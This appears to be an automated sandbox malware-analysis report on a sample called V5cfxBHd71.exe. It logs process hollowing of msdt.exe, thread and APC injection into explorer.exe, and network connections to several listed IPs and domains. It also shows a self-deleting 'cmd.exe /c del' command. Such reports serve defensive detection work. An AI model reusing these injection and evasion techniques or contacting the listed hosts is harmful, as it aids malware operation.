Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D1B02A mov eax, dword ptr fs:[00000030h]	17_2_04D1B02A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D1B02A mov eax, dword ptr fs:[00000030h]	17_2_04D1B02A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D1B02A mov eax, dword ptr fs:[00000030h]	17_2_04D1B02A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D1B02A mov eax, dword ptr fs:[00000030h]	17_2_04D1B02A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D3BC2C mov eax, dword ptr fs:[00000030h]	17_2_04D3BC2C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DB8DF1 mov eax, dword ptr fs:[00000030h]	17_2_04DB8DF1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D0B1E1 mov eax, dword ptr fs:[00000030h]	17_2_04D0B1E1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D0B1E1 mov eax, dword ptr fs:[00000030h]	17_2_04D0B1E1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D0B1E1 mov eax, dword ptr fs:[00000030h]	17_2_04D0B1E1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D2C182 mov eax, dword ptr fs:[00000030h]	17_2_04D2C182
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D3A185 mov eax, dword ptr fs:[00000030h]	17_2_04D3A185
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC138A mov eax, dword ptr fs:[00000030h]	17_2_04DC138A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D02D8A mov eax, dword ptr fs:[00000030h]	17_2_04D02D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D02D8A mov eax, dword ptr fs:[00000030h]	17_2_04D02D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D02D8A mov eax, dword ptr fs:[00000030h]	17_2_04D02D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D02D8A mov eax, dword ptr fs:[00000030h]	17_2_04D02D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D02D8A mov eax, dword ptr fs:[00000030h]	17_2_04D02D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D335A1 mov eax, dword ptr fs:[00000030h]	17_2_04D335A1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DD5BA5 mov eax, dword ptr fs:[00000030h]	17_2_04DD5BA5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D27D50 mov eax, dword ptr fs:[00000030h]	17_2_04D27D50
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DD8B58 mov eax, dword ptr fs:[00000030h]	17_2_04DD8B58
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D1EF40 mov eax, dword ptr fs:[00000030h]	17_2_04D1EF40
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D2B944 mov eax, dword ptr fs:[00000030h]	17_2_04D2B944
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D2B944 mov eax, dword ptr fs:[00000030h]	17_2_04D2B944
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D43D43 mov eax, dword ptr fs:[00000030h]	17_2_04D43D43
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D0B171 mov eax, dword ptr fs:[00000030h]	17_2_04D0B171
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D0B171 mov eax, dword ptr fs:[00000030h]	17_2_04D0B171
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D2C577 mov eax, dword ptr fs:[00000030h]	17_2_04D2C577
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D2C577 mov eax, dword ptr fs:[00000030h]	17_2_04D2C577
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DD8F6A mov eax, dword ptr fs:[00000030h]	17_2_04DD8F6A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC131B mov eax, dword ptr fs:[00000030h]	17_2_04DC131B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D9FF10 mov eax, dword ptr fs:[00000030h]	17_2_04D9FF10
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D9FF10 mov eax, dword ptr fs:[00000030h]	17_2_04D9FF10
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D09100 mov eax, dword ptr fs:[00000030h]	17_2_04D09100
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D09100 mov eax, dword ptr fs:[00000030h]	17_2_04D09100
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D09100 mov eax, dword ptr fs:[00000030h]	17_2_04D09100
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DD070D mov eax, dword ptr fs:[00000030h]	17_2_04DD070D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DD070D mov eax, dword ptr fs:[00000030h]	17_2_04DD070D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D0AD30 mov eax, dword ptr fs:[00000030h]	17_2_04D0AD30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D3E730 mov eax, dword ptr fs:[00000030h]	17_2_04D3E730
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DD8D34 mov eax, dword ptr fs:[00000030h]	17_2_04DD8D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D24120 mov eax, dword ptr fs:[00000030h]	17_2_04D24120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D24120 mov eax, dword ptr fs:[00000030h]	17_2_04D24120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D24120 mov eax, dword ptr fs:[00000030h]	17_2_04D24120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D24120 mov eax, dword ptr fs:[00000030h]	17_2_04D24120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D24120 mov ecx, dword ptr fs:[00000030h]	17_2_04D24120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D04F2E mov eax, dword ptr fs:[00000030h]	17_2_04D04F2E
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D04F2E mov eax, dword ptr fs:[00000030h]	17_2_04D04F2E

Source: C:\Users\user\Desktop\V5cfxBHd71.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\V5cfxBHd71.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.218 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.tpcgzwlpyggm.mobi
Source: C:\Windows\explorer.exe	Domain query: www.boogerstv.com
Source: C:\Windows\explorer.exe	Domain query: www.m678.xyz
Source: C:\Windows\explorer.exe	Domain query: www.kce0728com.net
Source: C:\Windows\explorer.exe	Domain query: www.vectoroutlines.com
Source: C:\Windows\explorer.exe	Domain query: www.3cheer.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.126.105 80	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Thread register set: target process: 3472	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\V5cfxBHd71.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\V5cfxBHd71.exe

Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: 1290000

Jump to behavior

Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process created: C:\Users\user\Desktop\V5cfxBHd71.exe C:\Users\user\Desktop\V5cfxBHd71.exe	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\V5cfxBHd71.exe'	Jump to behavior

Source: explorer.exe, 00000007.00000000.262162643.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.262162643.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.262162643.0000000001640000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000007.00000000.299874410.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000007.00000000.262162643.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000007.00000000.262162643.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Users\user\Desktop\V5cfxBHd71.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
